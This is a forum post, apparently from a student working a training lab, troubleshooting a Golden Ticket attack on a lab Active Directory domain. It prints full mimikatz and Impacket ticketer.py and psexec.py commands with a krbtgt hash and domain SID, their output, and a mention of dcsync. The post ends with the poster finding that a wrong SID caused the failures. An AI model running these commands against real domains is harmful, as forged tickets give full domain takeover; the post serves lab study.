Kerberos Attacks - Golden Ticket

From Windows:

mimikatz # kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt
User : Administrator
Domain : inlanefreight.local (INLANEFREIGHT)
SID : S-1-5-21-2974783224-3764228556-2640795941
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: c0231bd8a4a4de92fca0760c0ba9e7a6 - rc4_hmac_nt
Lifetime : 12/28/2023 10:32:23 AM ; 12/25/2033 10:32:23 AM ; 12/25/2033 10:32:23 AM
→ Ticket : ** Pass The Ticket **

  • PAC generated
  • PAC signed
  • EncTicketPart generated
  • EncTicketPart encrypted
  • KrbCred generated

Golden ticket for ‘Administrator @ inlanefreight.local’ successfully submitted for current session

PS C:\tools> klist

Current LogonId is 0:0x83356

Cached Tickets: (1)

#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:
PS C:\tools> Enter-PSSession dc01
Enter-PSSession : Connecting to remote server dc01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1

  • Enter-PSSession dc01
    CategoryInfo : InvalidArgument: (dc01:String) [Enter-PSSession], PSRemotingTransportException
    FullyQualifiedErrorId : CreateRemoteRunspaceFailed

PS C:\tools> klist

Current LogonId is 0:0x83356

Cached Tickets: (3)

#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 → forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 → DELEGATION
Kdc Called: DC01.INLANEFREIGHT.LOCAL

#1> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:

#2> Client: Administrator @ inlanefreight.local
Server: HTTP/dc01 @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 → forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.INLANEFREIGHT.LOCAL

From Linux:

└─# ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-2974783224-3764228556-2640795941 -domain inlanefreight.local -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[] Creating basic skeleton ticket and PAC Infos
[
] Customizing ticket for inlanefreight.local/Administrator
[] PAC_LOGON_INFO
[
] PAC_CLIENT_INFO_TYPE
[] EncTicketPart
[
] EncAsRepPart
[] Signing/Encrypting final ticket
[
] PAC_SERVER_CHECKSUM
[] PAC_PRIVSVR_CHECKSUM
[
] EncTicketPart
[] EncASRepPart
[
] Saving ticket in Administrator.ccache

┌──(root💀kali)-[~]
└─# export KRB5CCNAME=./Administrator.ccache

┌──(root💀kali)-[~]
└─# psexec.py -k -no-pass dc01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Which a google search points to here:

Question: is anyone able to solve this or should Support provide the AES256 key for the KRBTGT account so that we can solve the lab?

Forget everything… I was able to retrieve the krbtgt aes256 key using dcsync from a previous task, but after I noticed it failed with the AES256 key as well, I kept investigating and I realized I was using the wrong Domain SID…